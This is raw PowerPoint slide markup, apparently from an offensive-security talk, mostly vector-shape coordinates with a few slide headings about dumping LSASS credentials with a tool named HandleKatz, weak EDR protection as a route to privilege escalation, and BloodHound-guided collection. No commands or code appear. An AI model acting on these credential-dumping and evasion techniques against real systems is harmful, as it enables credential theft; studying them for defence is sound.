              </a:rPr>
              <a:t>HANDLEKATZ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2113820" y="277127"/>
            <a:ext cx="398218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LSASS DUMPS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DBF5EC-1780-F804-D220-13B68FBD1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1CE63A-1B5A-64A5-E08E-64C0379A732E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="2759036"/>
            <a:ext cx="6451592" cy="50971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MOST EDRs PROTECT LSASS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DF6F21-1E70-30FE-BDD9-B5FF6471E0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3394050"/>
            <a:ext cx="6451592" cy="85264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INCONSISTENT OR INADEQUATE PROTECTION = OPPORTUNITIES TO ELEVATE PRIVILEGES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147B4D-243F-6B45-56C4-418BAF3F901A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5403804" y="5998132"/>
            <a:ext cx="6451592" cy="58316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BLOODHOUND OUTPUT FOR TARGETED COLLECTION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4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bstract background of data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15051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493814" y="1027348"/>
            <a:ext cx="5691188" cy="4579937"/>
          </a:xfrm>
          <a:effectLst>
            <a:softEdge rad="6350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1966755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 Comprehensive Guide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34049" y="3429000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 List of New Techniques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34049" y="4891245"/>
            <a:ext cx="5186839" cy="5553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 Replacement for ”Good” Methodology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6998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53160" y="338682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WHAT THIS TALK IS NOT</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="24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0A90530-CE5F-2B98-1167-2CE7CA31F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26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Picture Placeholder 5" descr="Graffiti Spray outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A249D4-4C8B-9EDB-6251-AAAE229AEA34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="295601" y="1388151"/>
            <a:ext cx="3971599" cy="4388535"/>
            <a:chOff x="295601" y="1733141"/>
            <a:chExt cx="4138422" cy="4244468"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1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57B96DF-F4E4-8D0A-9848-6572C44B7184}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="295601" y="2177999"/>
              <a:ext cx="1478008" cy="3644179"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY0" fmla="*/ 3644179 h 3644179"/>
                <a:gd name="connsiteX1" fmla="*/ 1478008 w 1478008"/>
                <a:gd name="connsiteY1" fmla="*/ 3285122 h 3644179"/>
                <a:gd name="connsiteX2" fmla="*/ 1478008 w 1478008"/>
                <a:gd name="connsiteY2" fmla="*/ 1130135 h 3644179"/>
                <a:gd name="connsiteX3" fmla="*/ 1478008 w 1478008"/>
                <a:gd name="connsiteY3" fmla="*/ 1130135 h 3644179"/>
                <a:gd name="connsiteX4" fmla="*/ 1326167 w 1478008"/>
                <a:gd name="connsiteY4" fmla="*/ 871730 h 3644179"/>
                <a:gd name="connsiteX5" fmla="*/ 973022 w 1478008"/>
                <a:gd name="connsiteY5" fmla="*/ 506366 h 3644179"/>
                <a:gd name="connsiteX6" fmla="*/ 886805 w 1478008"/>
                <a:gd name="connsiteY6" fmla="*/ 551544 h 3644179"/>
                <a:gd name="connsiteX7" fmla="*/ 886805 w 1478008"/>
                <a:gd name="connsiteY7" fmla="*/ 488581 h 3644179"/>
                <a:gd name="connsiteX8" fmla="*/ 943757 w 1478008"/>
                <a:gd name="connsiteY8" fmla="*/ 399161 h 3644179"/>
                <a:gd name="connsiteX9" fmla="*/ 943757 w 1478008"/>
                <a:gd name="connsiteY9" fmla="*/ 233279 h 3644179"/>
                <a:gd name="connsiteX10" fmla="*/ 894491 w 1478008"/>
                <a:gd name="connsiteY10" fmla="*/ 233279 h 3644179"/>
                <a:gd name="connsiteX11" fmla="*/ 867177 w 1478008"/>
                <a:gd name="connsiteY11" fmla="*/ 203591 h 3644179"/>
                <a:gd name="connsiteX12" fmla="*/ 894491 w 1478008"/>
                <a:gd name="connsiteY12" fmla="*/ 176277 h 3644179"/>
                <a:gd name="connsiteX13" fmla="*/ 943757 w 1478008"/>
                <a:gd name="connsiteY13" fmla="*/ 176277 h 3644179"/>
                <a:gd name="connsiteX14" fmla="*/ 943757 w 1478008"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 3644179"/>
                <a:gd name="connsiteX15" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY15" fmla="*/ 0 h 3644179"/>
                <a:gd name="connsiteX16" fmla="*/ 534251 w 1478008"/>
                <a:gd name="connsiteY16" fmla="*/ 204754 h 3644179"/>
                <a:gd name="connsiteX17" fmla="*/ 534251 w 1478008"/>
                <a:gd name="connsiteY17" fmla="*/ 399161 h 3644179"/>
                <a:gd name="connsiteX18" fmla="*/ 591203 w 1478008"/>
                <a:gd name="connsiteY18" fmla="*/ 488581 h 3644179"/>
                <a:gd name="connsiteX19" fmla="*/ 591203 w 1478008"/>
                <a:gd name="connsiteY19" fmla="*/ 551544 h 3644179"/>
                <a:gd name="connsiteX20" fmla="*/ 504986 w 1478008"/>
                <a:gd name="connsiteY20" fmla="*/ 506366 h 3644179"/>
                <a:gd name="connsiteX21" fmla="*/ 151890 w 1478008"/>
                <a:gd name="connsiteY21" fmla="*/ 871730 h 3644179"/>
                <a:gd name="connsiteX22" fmla="*/ 0 w 1478008"/>
                <a:gd name="connsiteY22" fmla="*/ 1130135 h 3644179"/>
                <a:gd name="connsiteX23" fmla="*/ 0 w 1478008"/>
                <a:gd name="connsiteY23" fmla="*/ 1130135 h 3644179"/>
                <a:gd name="connsiteX24" fmla="*/ 0 w 1478008"/>
                <a:gd name="connsiteY24" fmla="*/ 3285122 h 3644179"/>
                <a:gd name="connsiteX25" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY25" fmla="*/ 3644179 h 3644179"/>
                <a:gd name="connsiteX26" fmla="*/ 632785 w 1478008"/>
                <a:gd name="connsiteY26" fmla="*/ 204754 h 3644179"/>
                <a:gd name="connsiteX27" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY27" fmla="*/ 98534 h 3644179"/>
                <a:gd name="connsiteX28" fmla="*/ 823497 w 1478008"/>
                <a:gd name="connsiteY28" fmla="*/ 98534 h 3644179"/>
                <a:gd name="connsiteX29" fmla="*/ 823689 w 1478008"/>
                <a:gd name="connsiteY29" fmla="*/ 99130 h 3644179"/>
                <a:gd name="connsiteX30" fmla="*/ 823497 w 1478008"/>
                <a:gd name="connsiteY30" fmla="*/ 99322 h 3644179"/>
                <a:gd name="connsiteX31" fmla="*/ 788714 w 1478008"/>
                <a:gd name="connsiteY31" fmla="*/ 275471 h 3644179"/>
                <a:gd name="connsiteX32" fmla="*/ 845174 w 1478008"/>
                <a:gd name="connsiteY32" fmla="*/ 321910 h 3644179"/>
                <a:gd name="connsiteX33" fmla="*/ 845568 w 1478008"/>
                <a:gd name="connsiteY33" fmla="*/ 395811 h 3644179"/>
                <a:gd name="connsiteX34" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY34" fmla="*/ 427637 h 3644179"/>
                <a:gd name="connsiteX35" fmla="*/ 632785 w 1478008"/>
                <a:gd name="connsiteY35" fmla="*/ 396895 h 3644179"/>
                <a:gd name="connsiteX36" fmla="*/ 788271 w 1478008"/>
                <a:gd name="connsiteY36" fmla="*/ 522427 h 3644179"/>
                <a:gd name="connsiteX37" fmla="*/ 788271 w 1478008"/>
                <a:gd name="connsiteY37" fmla="*/ 572876 h 3644179"/>
                <a:gd name="connsiteX38" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY38" fmla="*/ 576128 h 3644179"/>
                <a:gd name="connsiteX39" fmla="*/ 689737 w 1478008"/>
                <a:gd name="connsiteY39" fmla="*/ 572876 h 3644179"/>
                <a:gd name="connsiteX40" fmla="*/ 689737 w 1478008"/>
                <a:gd name="connsiteY40" fmla="*/ 522427 h 3644179"/>
                <a:gd name="connsiteX41" fmla="*/ 788271 w 1478008"/>
                <a:gd name="connsiteY41" fmla="*/ 522427 h 3644179"/>
                <a:gd name="connsiteX42" fmla="*/ 494788 w 1478008"/>
                <a:gd name="connsiteY42" fmla="*/ 617364 h 3644179"/>
                <a:gd name="connsiteX43" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY43" fmla="*/ 674662 h 3644179"/>
                <a:gd name="connsiteX44" fmla="*/ 982186 w 1478008"/>
                <a:gd name="connsiteY44" fmla="*/ 617906 h 3644179"/>
                <a:gd name="connsiteX45" fmla="*/ 1230195 w 1478008"/>
                <a:gd name="connsiteY45" fmla="*/ 896019 h 3644179"/>
                <a:gd name="connsiteX46" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY46" fmla="*/ 1082297 h 3644179"/>
                <a:gd name="connsiteX47" fmla="*/ 247813 w 1478008"/>
                <a:gd name="connsiteY47" fmla="*/ 896019 h 3644179"/>
                <a:gd name="connsiteX48" fmla="*/ 494788 w 1478008"/>
                <a:gd name="connsiteY48" fmla="*/ 617364 h 3644179"/>
                <a:gd name="connsiteX49" fmla="*/ 175489 w 1478008"/>
                <a:gd name="connsiteY49" fmla="*/ 976176 h 3644179"/>
                <a:gd name="connsiteX50" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY50" fmla="*/ 1180831 h 3644179"/>
                <a:gd name="connsiteX51" fmla="*/ 1304392 w 1478008"/>
                <a:gd name="connsiteY51" fmla="*/ 973368 h 3644179"/>
                <a:gd name="connsiteX52" fmla="*/ 1379474 w 1478008"/>
                <a:gd name="connsiteY52" fmla="*/ 1130677 h 3644179"/>
                <a:gd name="connsiteX53" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY53" fmla="*/ 1360606 h 3644179"/>
                <a:gd name="connsiteX54" fmla="*/ 98534 w 1478008"/>
                <a:gd name="connsiteY54" fmla="*/ 1130677 h 3644179"/>
                <a:gd name="connsiteX55" fmla="*/ 175489 w 1478008"/>
                <a:gd name="connsiteY55" fmla="*/ 976176 h 3644179"/>
                <a:gd name="connsiteX56" fmla="*/ 98534 w 1478008"/>
                <a:gd name="connsiteY56" fmla="*/ 1293504 h 3644179"/>
                <a:gd name="connsiteX57" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY57" fmla="*/ 1459140 h 3644179"/>
                <a:gd name="connsiteX58" fmla="*/ 1379474 w 1478008"/>
                <a:gd name="connsiteY58" fmla="*/ 1293504 h 3644179"/>
                <a:gd name="connsiteX59" fmla="*/ 1379474 w 1478008"/>
                <a:gd name="connsiteY59" fmla="*/ 3285122 h 3644179"/>
                <a:gd name="connsiteX60" fmla="*/ 739004 w 1478008"/>
                <a:gd name="connsiteY60" fmla="*/ 3545645 h 3644179"/>
                <a:gd name="connsiteX61" fmla="*/ 98534 w 1478008"/>
                <a:gd name="connsiteY61" fmla="*/ 3285122 h 36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78008" h="3644179">
                  <a:moveTo>
                    <a:pt x="739004" y="3644179"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1153388" y="3644179"/>
                    <a:pt x="1478008" y="3486525"/>
                    <a:pt x="1478008" y="3285122"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1478008" y="1130135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1478008" y="1130135"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1478008" y="1056235"/>
                    <a:pt x="1428741" y="918287"/>
                    <a:pt x="1326167" y="871730"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271156" y="701961"/>
                    <a:pt x="1140820" y="567117"/>
                    <a:pt x="973022" y="506366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="946891" y="525945"/>
                    <a:pt x="917779" y="541203"/>
                    <a:pt x="886805" y="551544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="886805" y="488581"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="920114" y="470776"/>
                    <a:pt x="941708" y="436875"/>
                    <a:pt x="943757" y="399161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="943757" y="233279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894491" y="233279"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="878750" y="232624"/>
                    <a:pt x="866522" y="219332"/>
                    <a:pt x="867177" y="203591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="867793" y="188771"/>
                    <a:pt x="879666" y="176893"/>
                    <a:pt x="894491" y="176277"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="943757" y="176277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943757" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739004" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="625966" y="108"/>
                    <a:pt x="534359" y="91715"/>
                    <a:pt x="534251" y="204754"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="534251" y="399161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="536300" y="436875"/>
                    <a:pt x="557894" y="470776"/>
                    <a:pt x="591203" y="488581"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="591203" y="551544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="560229" y="541203"/>
                    <a:pt x="531117" y="525945"/>
                    <a:pt x="504986" y="506366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336414" y="565900"/>
                    <a:pt x="205635" y="701222"/>
                    <a:pt x="151890" y="871730"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64284" y="929988"/>
                    <a:pt x="8287" y="1025256"/>
                    <a:pt x="0" y="1130135"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1130135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3285122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3486525"/>
                    <a:pt x="324620" y="3644179"/>
                    <a:pt x="739004" y="3644179"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="632785" y="204754"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="632785" y="146091"/>
                    <a:pt x="680342" y="98534"/>
                    <a:pt x="739004" y="98534"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="823497" y="98534"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="823714" y="98647"/>
                    <a:pt x="823802" y="98913"/>
                    <a:pt x="823689" y="99130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="823645" y="99214"/>
                    <a:pt x="823581" y="99278"/>
                    <a:pt x="823497" y="99322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765249" y="138361"/>
                    <a:pt x="749675" y="217223"/>
                    <a:pt x="788714" y="275471"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="802573" y="296154"/>
                    <a:pt x="822206" y="312303"/>
                    <a:pt x="845174" y="321910"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="845568" y="395811"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="815742" y="420267"/>
                    <a:pt x="777353" y="431731"/>
                    <a:pt x="739004" y="427637"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="700970" y="431318"/>
                    <a:pt x="662970" y="420321"/>
                    <a:pt x="632785" y="396895"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="788271" y="522427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="788271" y="572876"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="772112" y="574453"/>
                    <a:pt x="756001" y="576128"/>
                    <a:pt x="739004" y="576128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="722007" y="576128"/>
                    <a:pt x="705897" y="574453"/>
                    <a:pt x="689737" y="572876"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="689737" y="522427"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="722391" y="527418"/>
                    <a:pt x="755617" y="527418"/>
                    <a:pt x="788271" y="522427"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="494788" y="617364"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="570048" y="656778"/>
                    <a:pt x="654068" y="676490"/>
                    <a:pt x="739004" y="674662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="823546" y="676470"/>
                    <a:pt x="907177" y="656950"/>
                    <a:pt x="982186" y="617906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1099658" y="672460"/>
                    <a:pt x="1189397" y="773092"/>
                    <a:pt x="1230195" y="896019"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1214824" y="986128"/>
                    <a:pt x="1009972" y="1082297"/>
                    <a:pt x="739004" y="1082297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="468036" y="1082297"/>
                    <a:pt x="263184" y="986128"/>
                    <a:pt x="247813" y="896019"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287921" y="772895"/>
                    <a:pt x="377375" y="671967"/>
                    <a:pt x="494788" y="617364"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="175489" y="976176"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="250572" y="1096092"/>
                    <a:pt x="471288" y="1180831"/>
                    <a:pt x="739004" y="1180831"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1008839" y="1180831"/>
                    <a:pt x="1231033" y="1094761"/>
                    <a:pt x="1304392" y="973368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1348338" y="1014476"/>
                    <a:pt x="1375154" y="1070655"/>
                    <a:pt x="1379474" y="1130677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1379474" y="1222215"/>
                    <a:pt x="1124025" y="1360606"/>
                    <a:pt x="739004" y="1360606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353983" y="1360606"/>
                    <a:pt x="98534" y="1222215"/>
                    <a:pt x="98534" y="1130677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105979" y="1071956"/>
                    <a:pt x="133106" y="1017496"/>
                    <a:pt x="175489" y="976176"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="98534" y="1293504"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="226628" y="1392038"/>
                    <a:pt x="465720" y="1459140"/>
                    <a:pt x="739004" y="1459140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1012288" y="1459140"/>
                    <a:pt x="1251627" y="1392186"/>
                    <a:pt x="1379474" y="1293504"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1379474" y="3285122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1379474" y="3408338"/>
                    <a:pt x="1116438" y="3545645"/>
                    <a:pt x="739004" y="3545645"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361570" y="3545645"/>
                    <a:pt x="98534" y="3408338"/>
                    <a:pt x="98534" y="3285122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91B3B1A-17BD-9106-C573-D3188BDE57AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266279" y="3187429"/>
              <a:ext cx="2167745" cy="2315547"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 394136 w 2167745"/>
                <a:gd name="connsiteY0" fmla="*/ 739005 h 2315547"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 2167745"/>
                <a:gd name="connsiteY1" fmla="*/ 739005 h 2315547"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 2167745"/>
                <a:gd name="connsiteY2" fmla="*/ 837539 h 2315547"/>
                <a:gd name="connsiteX3" fmla="*/ 394136 w 2167745"/>
                <a:gd name="connsiteY3" fmla="*/ 837539 h 2315547"/>
                <a:gd name="connsiteX4" fmla="*/ 394136 w 2167745"/>
                <a:gd name="connsiteY4" fmla="*/ 1478009 h 2315547"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 2167745"/>
                <a:gd name="connsiteY5" fmla="*/ 1478009 h 2315547"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 2167745"/>
                <a:gd name="connsiteY6" fmla="*/ 1576543 h 2315547"/>
                <a:gd name="connsiteX7" fmla="*/ 837538 w 2167745"/>
                <a:gd name="connsiteY7" fmla="*/ 1576543 h 2315547"/>
                <a:gd name="connsiteX8" fmla="*/ 837538 w 2167745"/>
                <a:gd name="connsiteY8" fmla="*/ 2217014 h 2315547"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 2167745"/>
                <a:gd name="connsiteY9" fmla="*/ 2217014 h 2315547"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 2167745"/>
                <a:gd name="connsiteY10" fmla="*/ 2315548 h 2315547"/>
                <a:gd name="connsiteX11" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY11" fmla="*/ 2315548 h 2315547"/>
                <a:gd name="connsiteX12" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY12" fmla="*/ 2217014 h 2315547"/>
                <a:gd name="connsiteX13" fmla="*/ 936072 w 2167745"/>
                <a:gd name="connsiteY13" fmla="*/ 2217014 h 2315547"/>
                <a:gd name="connsiteX14" fmla="*/ 936072 w 2167745"/>
                <a:gd name="connsiteY14" fmla="*/ 1576543 h 2315547"/>
                <a:gd name="connsiteX15" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY15" fmla="*/ 1576543 h 2315547"/>
                <a:gd name="connsiteX16" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY16" fmla="*/ 1478009 h 2315547"/>
                <a:gd name="connsiteX17" fmla="*/ 1773610 w 2167745"/>
                <a:gd name="connsiteY17" fmla="*/ 1478009 h 2315547"/>
                <a:gd name="connsiteX18" fmla="*/ 1773610 w 2167745"/>
                <a:gd name="connsiteY18" fmla="*/ 837539 h 2315547"/>
                <a:gd name="connsiteX19" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY19" fmla="*/ 837539 h 2315547"/>
                <a:gd name="connsiteX20" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY20" fmla="*/ 739005 h 2315547"/>
                <a:gd name="connsiteX21" fmla="*/ 1428741 w 2167745"/>
                <a:gd name="connsiteY21" fmla="*/ 739005 h 2315547"/>
                <a:gd name="connsiteX22" fmla="*/ 1428741 w 2167745"/>
                <a:gd name="connsiteY22" fmla="*/ 98534 h 2315547"/>
                <a:gd name="connsiteX23" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY23" fmla="*/ 98534 h 2315547"/>
                <a:gd name="connsiteX24" fmla="*/ 2167745 w 2167745"/>
                <a:gd name="connsiteY24" fmla="*/ 0 h 2315547"/>
                <a:gd name="connsiteX25" fmla="*/ 1034606 w 2167745"/>
                <a:gd name="connsiteY25" fmla="*/ 0 h 2315547"/>
                <a:gd name="connsiteX26" fmla="*/ 1034606 w 2167745"/>
                <a:gd name="connsiteY26" fmla="*/ 98534 h 2315547"/>
                <a:gd name="connsiteX27" fmla="*/ 1330207 w 2167745"/>
                <a:gd name="connsiteY27" fmla="*/ 98534 h 2315547"/>
                <a:gd name="connsiteX28" fmla="*/ 1330207 w 2167745"/>
                <a:gd name="connsiteY28" fmla="*/ 739005 h 2315547"/>
                <a:gd name="connsiteX29" fmla="*/ 394136 w 2167745"/>
                <a:gd name="connsiteY29" fmla="*/ 739005 h 2315547"/>
                <a:gd name="connsiteX30" fmla="*/ 1675076 w 2167745"/>
                <a:gd name="connsiteY30" fmla="*/ 837539 h 2315547"/>
                <a:gd name="connsiteX31" fmla="*/ 1675076 w 2167745"/>
                <a:gd name="connsiteY31" fmla="*/ 1478009 h 2315547"/>
                <a:gd name="connsiteX32" fmla="*/ 492669 w 2167745"/>
                <a:gd name="connsiteY32" fmla="*/ 1478009 h 2315547"/>
                <a:gd name="connsiteX33" fmla="*/ 492669 w 2167745"/>
                <a:gd name="connsiteY33" fmla="*/ 837539 h 231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67745" h="2315547">
                  <a:moveTo>
                    <a:pt x="394136" y="739005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="739005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="837539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394136" y="837539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394136" y="1478009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1478009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1576543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837538" y="1576543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837538" y="2217014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2217014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2315548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="2315548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="2217014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936072" y="2217014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936072" y="1576543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="1576543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="1478009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773610" y="1478009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773610" y="837539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="837539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="739005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428741" y="739005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428741" y="98534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="98534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167745" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034606" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034606" y="98534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1330207" y="98534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1330207" y="739005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394136" y="739005"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1675076" y="837539"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1675076" y="1478009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492669" y="1478009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492669" y="837539"/>
                  </a:ln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C3C2E2A-7465-0C3F-EA40-8FD80062E91A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1791986" y="2338363"/>
              <a:ext cx="904393" cy="98533"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 904393"/>
                <a:gd name="connsiteY0" fmla="*/ 49267 h 98533"/>
                <a:gd name="connsiteX1" fmla="*/ 49267 w 904393"/>
                <a:gd name="connsiteY1" fmla="*/ 98534 h 98533"/>
                <a:gd name="connsiteX2" fmla="*/ 855126 w 904393"/>
                <a:gd name="connsiteY2" fmla="*/ 98534 h 98533"/>
                <a:gd name="connsiteX3" fmla="*/ 904393 w 904393"/>
                <a:gd name="connsiteY3" fmla="*/ 49267 h 98533"/>
                <a:gd name="connsiteX4" fmla="*/ 855126 w 904393"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 98533"/>
